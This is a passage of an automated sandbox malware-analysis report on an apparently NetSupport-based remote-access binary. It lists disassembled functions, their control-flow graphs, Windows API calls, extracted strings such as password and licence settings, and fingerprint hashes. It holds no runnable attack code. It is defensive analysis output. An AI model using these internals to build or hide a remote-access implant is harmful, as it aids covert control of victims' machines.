                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileModuleName__stricmp_l_strrchr
                                                                                      • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                      • API String ID: 1609618855-357498123
                                                                                      • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                      • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                      • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                      • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                      Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2498 11086700-1108671d call 110866f0 2501 1108671f-1108672f call 11161d01 2498->2501 2502 11086730-11086740 call 11144bd0 2498->2502 2507 11086742-1108674a 2502->2507 2507->2507 2508 1108674c-11086752 2507->2508 2509 11086753-11086759 2508->2509 2509->2509 2510 1108675b-11086792 LoadLibraryA 2509->2510 2511 110867f9-1108680e GetProcAddress 2510->2511 2512 11086794-1108679b 2510->2512 2515 1108689c-110868ad call 11161d01 2511->2515 2516 11086814-11086823 GetProcAddress 2511->2516 2513 1108679d-110867ee GetModuleFileNameA call 11081b40 LoadLibraryA 2512->2513 2514 110867f0-110867f3 2512->2514 2513->2514 2514->2511 2514->2515 2516->2515 2519 11086825-11086834 GetProcAddress 2516->2519 2519->2515 2522 11086836-11086845 GetProcAddress 2519->2522 2522->2515 2523 11086847-11086856 GetProcAddress 2522->2523 2523->2515 2524 11086858-11086867 GetProcAddress 2523->2524 2524->2515 2525 11086869-11086878 GetProcAddress 2524->2525 2525->2515 2526 1108687a-11086889 GetProcAddress 2525->2526 2526->2515 2527 1108688b-1108689a GetProcAddress 2526->2527 2527->2515 2528 110868ae-110868c3 call 11161d01 2527->2528
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                      • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                      • API String ID: 2201880244-3035937465
                                                                                      • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                      • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                      • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                      • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                      Function 11141890 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 672registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2531 11141890-111418c6 2532 111418cf-111418e4 call 1110f420 2531->2532 2533 111418c8-111418ca 2531->2533 2539 111418e6-1114190e call 11060f70 2532->2539 2540 11141910-11141912 2532->2540 2534 111421f2-1114220d call 11161d01 2533->2534 2542 11141918-11141947 call 11061700 2539->2542 2540->2542 2547 11141950-1114195d call 11142e50 2542->2547 2548 11141949-1114194a RegCloseKey 2542->2548 2551 11141964-11141985 call 11144dc0 call 11143230 2547->2551 2552 1114195f 2547->2552 2548->2547 2557 11141997-111419ad call 1110f420 2551->2557 2558 11141987-11141992 call 11062d60 2551->2558 2552->2551 2562 111419c2 2557->2562 2563 111419af-111419c0 call 11060be0 2557->2563 2558->2557 2565 111419c8-111419e2 call 1110f420 2562->2565 2563->2565 2569 111419e4-111419f5 call 11060be0 2565->2569 2570 111419f7 2565->2570 2572 111419fd-11141a17 call 1110f420 2569->2572 2570->2572 2576 11141a2c 2572->2576 2577 11141a19-11141a2a call 11060be0 2572->2577 2579 11141a32-11141a79 call 11060760 * 2 2576->2579 2577->2579 2585 11141a80 2579->2585 2586 11141a87-11141a8e 2585->2586 2587 11141a90-11141a97 2586->2587 2588 11141a9d-11141aa5 2586->2588 2587->2588 2589 11141d9a 2587->2589 2590 11141aa7-11141aad 2588->2590 2591 11141ac9-11141ad0 2588->2591 2594 11141da0-11141da2 2589->2594 2590->2591 2595 11141aaf-11141abc call 110607f0 2590->2595 2592 11141af5-11141b03 2591->2592 2593 11141ad2-11141ad9 2591->2593 2600 11141b05-11141b07 2592->2600 2601 11141b0d-11141b0f 2592->2601 2593->2592 2597 11141adb-11141ae8 call 110607f0 2593->2597 2598 1114217f-11142187 2594->2598 2599 11141da8-11141df2 call 110d1550 call 1105dd10 2594->2599 2609 11141ac7 2595->2609 2610 11141abe-11141ac5 2595->2610 2622 11141af3 2597->2622 2623 11141aea-11141af1 2597->2623 2604 11142191-11142199 2598->2604 2605 11142189-1114218d 2598->2605 2647 11141f3d-11141f85 call 11060f40 call 1106b5c0 call 110679c0 2599->2647 2648 11141df8-11141e1f call 11060760 call 110607f0 2599->2648 2600->2589 2600->2601 2607 11141b11-11141b13 2601->2607 2608 11141b5d-11141b5f 2601->2608 2614 111421a3-111421ab 2604->2614 2615 1114219b-1114219f 2604->2615 2605->2604 2617 11141b15-11141b1b 2607->2617 2618 11141b2f-11141b31 2607->2618 2612 11141b61-11141b66 2608->2612 2613 11141b68-11141b6a 2608->2613 2609->2591 2610->2591 2624 11141b8b-11141ba5 call 11081bb0 2612->2624 2625 11141b73-11141b89 call 11081bb0 2613->2625 2626 11141b6c-11141b71 2613->2626 2627 111421b5-111421f0 call 11060640 * 2 call 111618c1 2614->2627 2628 111421ad-111421b1 2614->2628 2615->2614 2617->2618 2619 11141b1d-11141b2a call 11146450 2617->2619 2620 11141d85-11141d98 call 11146450 2618->2620 2621 11141b37-11141b3e 2618->2621 2619->2585 2620->2594 2621->2620 2631 11141b44-11141b58 call 11146450 2621->2631 2622->2592 2623->2592 2643 11141cac-11141ce9 call 1105de00 call 111319f0 2624->2643 2644 11141bab 2624->2644 2625->2624 2626->2624 2627->2534 2628->2627 2631->2586 2672 11141cf1-11141cf8 2643->2672 2673 11141ceb 2643->2673 2649 11141bb5 2644->2649 2650 11141bad-11141baf 2644->2650 2703 11141f87 2647->2703 2704 11141fb3-11141fe8 EnterCriticalSection call 11060420 call 11060f40 2647->2704 2683 11141e21-11141e50 call 11146450 call 110607f0 2648->2683 2684 11141e52-11141e7a call 11060760 call 110607f0 2648->2684 2656 11141c3e-11141c7b call 1105de00 call 111319f0 2649->2656 2657 11141bbb-11141bc1 2649->2657 2650->2643 2650->2649 2692 11141c83-11141c8a 2656->2692 2693 11141c7d 2656->2693 2663 11141bc7-11141bcb 2657->2663 2669 11141be7-11141be9 2663->2669 2670 11141bcd-11141bcf 2663->2670 2679 11141bec-11141bee 2669->2679 2677 11141bd1-11141bd7 2670->2677 2678 11141be3-11141be5 2670->2678 2681 11141d0a 2672->2681 2682 11141cfa-11141d08 2672->2682 2673->2672 2677->2669 2686 11141bd9-11141be1 2677->2686 2678->2679 2687 11141bf0-11141c2a call 1105de00 call 111319f0 2679->2687 2688 11141c32-11141c39 2679->2688 2690 11141d11 2681->2690 2682->2681 2682->2690 2683->2684 2720 11141eb1-11141ed8 call 11060760 call 110607f0 2684->2720 2721 11141e7c 2684->2721 2686->2663 2686->2678 2687->2688 2722 11141c2c 2687->2722 2688->2690 2697 11141d18-11141d1a 2690->2697 2699 11141c9c 2692->2699 2700 11141c8c-11141c9a 2692->2700 2693->2692 2707 11141d1c-11141d1e 2697->2707 2708 11141d3e-11141d56 call 11081c60 2697->2708 2711 11141ca3-11141caa 2699->2711 2700->2699 2700->2711 2706 11141f90-11141f9e call 110508e0 2703->2706 2739 11141ffa-1114200c LeaveCriticalSection 2704->2739 2740 11141fea-11141ff7 call 1102a9f0 2704->2740 2730 11141fa0-11141fa1 2706->2730 2731 11141fa3 2706->2731 2707->2708 2716 11141d20-11141d38 call 11081bb0 2707->2716 2727 11141d58 2708->2727 2728 11141d5b-11141d73 call 11081c60 2708->2728 2711->2697 2716->2586 2716->2708 2759 11141f11-11141f38 call 11060640 * 3 2720->2759 2760 11141eda 2720->2760 2729 11141e80-11141eaf call 11146450 call 110607f0 2721->2729 2722->2688 2727->2728 2749 11141d75-11141d78 2728->2749 2750 11141d7d-11141d80 2728->2750 2729->2720 2737 11141fa4-11141fb1 call 110679c0 2730->2737 2731->2737 2737->2704 2737->2706 2741 11142051-1114209e call 11133400 call 110d1550 call 110cff20 2739->2741 2742 1114200e-11142010 2739->2742 2740->2739 2782 111420a4-111420c1 call 110d12e0 2741->2782 2783 1114214c-11142179 call 110d07c0 call 1106b620 call 110d07c0 2741->2783 2742->2741 2748 11142012-11142034 call 11146450 call 1113cc30 call 111414a0 2742->2748 2748->2741 2781 11142036-1114204e call 11146450 call 11026ba0 2748->2781 2749->2586 2750->2586 2759->2647 2764 11141ee0-11141f0f call 11146450 call 110607f0 2760->2764 2764->2759 2781->2741 2796 111420c3-111420d7 call 11029450 2782->2796 2797 111420da-111420f0 call 11081bb0 2782->2797 2783->2598 2796->2797 2803 111420f2-1114210a call 11009450 call 11081a70 2797->2803 2804 1114212b-11142145 2797->2804 2803->2804 2811 1114210c-11142129 call 11009450 2803->2811 2809 1114214a 2804->2809 2809->2783 2811->2809
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$
                                                                                      • API String ID: 3535843008-4208778996
                                                                                      • Opcode ID: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
                                                                                      • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                      • Opcode Fuzzy Hash: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
                                                                                      • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                      Function 11138C30 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 348windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2814 11138c30-11138c47 2815 11139072-11139081 call 11161d01 2814->2815 2816 11138c4d-11138c54 2814->2816 2816->2815 2818 11138c5a-11138c61 2816->2818 2818->2815 2820 11138c67-11138c6e 2818->2820 2820->2815 2821 11138c74-11138c7b 2820->2821 2821->2815 2822 11138c81-11138c91 call 111450a0 2821->2822 2825 11138c93-11138c9a 2822->2825 2826 11138ca0-11138ce7 call 1105dd10 call 110637c0 2822->2826 2825->2815 2825->2826 2831 11138cf5-11138d1e call 1112c920 2826->2831 2832 11138ce9-11138cf0 2826->2832 2835 11138d24-11138d27 2831->2835 2836 11138dda call 110ea430 2831->2836 2832->2831 2838 11138d35 2835->2838 2839 11138d29-11138d2e 2835->2839 2840 11138ddf-11138de1 2836->2840 2842 11138d3b-11138d46 2838->2842 2839->2838 2841 11138d30-11138d33 2839->2841 2843 11138de3-11138dfe call 1105dd10 2840->2843 2844 11138e00-11138e0f PostMessageA 2840->2844 2841->2842 2845 11138d48 2842->2845 2846 11138d4d-11138d65 2842->2846 2843->2844 2848 11138e15-11138e1a 2843->2848 2844->2848 2845->2846 2856 11138dc1-11138dc8 2846->2856 2857 11138d67-11138d6d 2846->2857 2850 11138e25-11138e29 2848->2850 2851 11138e1c-11138e20 call 1110f270 2848->2851 2854 11138e2b-11138e33 2850->2854 2855 11138e4d-11138e76 call 11130410 call 11146ec0 call 1112cb20 call 111618c1 2850->2855 2851->2850 2863 11138e35-11138e4b 2854->2863 2864 11138e79-11138e81 2854->2864 2855->2864 2861 11138dd7 2856->2861 2862 11138dca-11138dd1 call 11131a80 2856->2862 2859 11138d6f-11138d74 2857->2859 2860 11138dbc 2857->2860 2859->2860 2866 11138d76-11138d7b 2859->2866 2860->2856 2861->2836 2862->2861 2879 11138dd3 2862->2879 2863->2864 2867 11138e83-11138e9d call 111618c1 call 11161d01 2864->2867 2868 11138e9e-11138ec4 call 11142e80 call 11146ee0 SetWindowTextA 2864->2868 2866->2860 2871 11138d7d-11138d9f 2866->2871 2888 11138ed0-11138ee9 call 111618c1 * 2 2868->2888 2889 11138ec6-11138ecd call 111352b0 2868->2889 2871->2860 2886 11138da1-11138db0 call 11145b40 2871->2886 2879->2861 2898 11138db2-11138dba 2886->2898 2901 11138eeb-11138eef 2888->2901 2902 11138f2e-11138f32 2888->2902 2889->2888 2898->2860 2898->2898 2905 11138f03-11138f0a 2901->2905 2906 11138ef1-11138f01 call 111352b0 2901->2906 2903 11138f38-11138f3a 2902->2903 2904 11138ffc-11138ffe 2902->2904 2909 11138f5c-11138f69 call 110f8640 2903->2909 2910 11138f3c-11138f3e 2903->2910 2912 11139000-11139002 2904->2912 2913 1113901d-1113902a call 110f8640 2904->2913 2907 11138f24 2905->2907 2908 11138f0c-11138f21 call 11131210 2905->2908 2906->2905 2906->2908 2907->2902 2908->2907 2927 1113906f-11139071 2909->2927 2928 11138f6f-11138f80 IsWindowVisible 2909->2928 2910->2909 2917 11138f40-11138f50 call 111352b0 2910->2917 2914 11139013-1113901a call 11131210 2912->2914 2915 11139004-1113900e call 111352b0 2912->2915 2913->2927 2932 1113902c-1113903c IsWindowVisible 2913->2932 2914->2913 2915->2914 2917->2909 2934 11138f52-11138f59 call 11131210 2917->2934 2927->2815 2928->2927 2933 11138f86-11138f96 call 111450a0 2928->2933 2932->2927 2935 1113903e-11139049 IsWindowVisible 2932->2935 2933->2927 2942 11138f9c-11138fb4 GetForegroundWindow IsWindowVisible 2933->2942 2934->2909 2935->2927 2938 1113904b-1113906d EnableWindow call 11131210 EnableWindow 2935->2938 2938->2927 2944 11138fc1-11138fcd call 11131210 2942->2944 2945 11138fb6-11138fbf EnableWindow 2942->2945 2948 11138fcf-11138fd5 2944->2948 2949 11138fde-11138ffb EnableWindow call 11161d01 2944->2949 2945->2944 2948->2949 2950 11138fd7-11138fd8 SetForegroundWindow 2948->2950 2950->2949
                                                                                      APIs
                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                      • PostMessageA.USER32(0002046E,000006CF,00000007,00000000), ref: 11138E0F
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • SetWindowTextA.USER32(0002046E,00000000), ref: 11138EB7
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11138F7C
                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11138FAA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                      • EnableWindow.USER32(0002046E,00000001), ref: 11138FE7
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11139038
                                                                                      • IsWindowVisible.USER32(0002046E), ref: 11139045
                                                                                      • EnableWindow.USER32(0002046E,00000000), ref: 11139059
                                                                                      • EnableWindow.USER32(0002046E,00000000), ref: 11138FBF
                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(0002046E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                      • EnableWindow.USER32(0002046E,00000001), ref: 1113906D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                      • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText$
                                                                                      • API String ID: 3453649892-2635238298
                                                                                      • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                      • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                      • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                      • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                      Function 11074A00 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                      • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                      • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                      • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                      • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                      • _strncpy.LIBCMT ref: 11074B68
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                      • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                      • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                      • std::exception::exception.LIBCMT ref: 11074D68
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                      • API String ID: 703120326-1497550179
                                                                                      • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                      • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                      Function 11108D30 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                      • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                      • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                        • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                        • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
